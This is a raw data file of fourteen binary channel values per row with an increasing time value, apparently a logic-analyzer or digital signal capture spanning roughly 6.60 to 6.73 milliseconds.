0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5986000e-03 0,1,0,0,0,1,0,0,0,0,0,0,0,0,6.5986040e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5986080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5986240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5986520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5986760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5987000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5987240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5987480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5987720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5988000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5988240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5988520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5988760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5989000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5989240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5989480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5989720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5990000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5990240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5990520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5990760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5991000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5991240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5991480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5991720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5992000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5992240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5992520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5992760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5993000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5993240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5993480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5993720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5993960e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5994040e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5994480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5994720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5994800e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5995000e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5995240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5995480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5995720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5995960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5996200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5996440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5996720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5996960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5997240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5997480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5997720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5997960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5998200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5998440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5998720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5998760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5998960e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5999240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5999720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5999960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6000040e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6000200e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6000440e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6000720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6000960e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6001240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6001480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6001720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6001960e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6002040e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6002200e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6002440e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6002720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6002960e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6003480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6003720e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6003960e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6004200e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6004440e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6004720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6004760e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6004960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6005240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6005480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6005720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6005960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6006200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6006440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6006720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6006960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6007240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6007480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6007720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6007960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6008200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6008440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6008720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6008760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6009240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6009480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6009560e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6009720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6009960e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6010200e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6010440e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6010720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6010960e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6011240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6011480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6011720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6011960e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6012200e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6012440e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6012520e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6012720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6012960e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6013240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6013480e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6013720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6013960e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6014200e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6014440e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6014720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6014960e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.6015480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.6015720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6015800e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6015960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6016200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6016440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6016720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6016960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6017240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6017480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6017720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6017960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6018200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6018440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6018720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6018960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6019240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6019480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6019720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6019960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6020200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6020440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6020720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6020960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6021240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6021480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6021720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6021960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6022200e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6022440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6022720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6022960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6023240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6023480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6023720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6023960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6024240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6024440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6024720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6024960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6025240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6025480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6025720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6025960e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6026240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6026440e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6026760e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6027000e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6027240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.6027480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.6027720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7273720e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7275880e-03 1,1,0,0,0,0,0,0,0,0,0,1,0,1,6.7276160e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7276440e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,6.7279280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7279520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,6.7279800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7280040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,6.7280280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7280520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,6.7280760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.7281000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,1,6.7281520e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,1,6.7281800e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7282040e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7282280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7282360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7282520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7282760e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7282840e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7283280e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7283520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7283600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7283800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7284040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7284280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7284520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7284760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7285000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7285280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7285520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7285800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7286040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7286280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7286520e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7286560e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7287000e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7287280e-03 1,1,0,0,0,1,0,0,0,0,0,0,0,0,6.7287320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7287360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7287520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7287800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7288040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7288280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7288520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7288760e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7289000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7289240e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7289320e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7289520e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7289800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7289840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7290040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7290280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7290520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7290760e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7291000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7291280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7291520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7291800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7292040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7292280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7292760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7293000e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7293080e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7293280e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7293520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7293600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7293800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7294040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7294280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7294520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7294760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7295000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7295280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7295520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7295800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7296040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7296280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7296520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7296760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7297000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7297280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7297520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7297800e-03 1,1,0,0,0,0,0,0,0,1,0,0,0,0,6.7298040e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7298080e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7298520e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7298760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7298840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7299000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7299280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7299520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7299800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7300040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7300280e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7300320e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7300760e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7301000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7301080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7301280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7301520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7301800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7302040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7302280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7302520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7303040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7303280e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7303320e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7303520e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7303800e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7304280e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7304520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7304600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7304760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7305000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7305280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7305520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7305800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7306040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7306280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7306520e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7306760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7307040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7307720e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7307960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7308560e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7308760e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7309000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7309240e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7309800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7310040e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7310280e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7310480e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7310680e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7310920e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7311160e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7311400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7311600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7311800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7312040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7312280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7312840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7313080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7313320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7313520e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7313600e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7314320e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7314560e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7314640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7314760e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7315000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7315240e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7315440e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7315680e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7315880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7316120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7316360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7316800e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7317000e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7317240e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7317480e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7317720e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7317920e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7318160e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7318360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7318600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7318840e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7318920e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7319280e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7319480e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7319600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7319720e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7319960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7320200e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7320400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7320600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7320880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7321120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7321400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7321640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7321880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7322120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7322360e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7322440e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7322880e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7323120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7323200e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7323400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7323640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7323880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7324120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7324360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7324600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7324880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7325120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7325400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7325640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7325880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7326120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7326360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7326600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7326880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7327120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7327400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7327640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7327880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7328120e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7328160e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7328600e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7328880e-03 1,1,0,0,0,1,0,0,0,0,0,0,0,0,6.7328920e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7328960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7329120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7329400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7329640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7329840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7330120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7330360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7330600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7330840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7331120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7331400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7331640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7331920e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7332200e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7332440e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7332680e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7332920e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7333200e-03 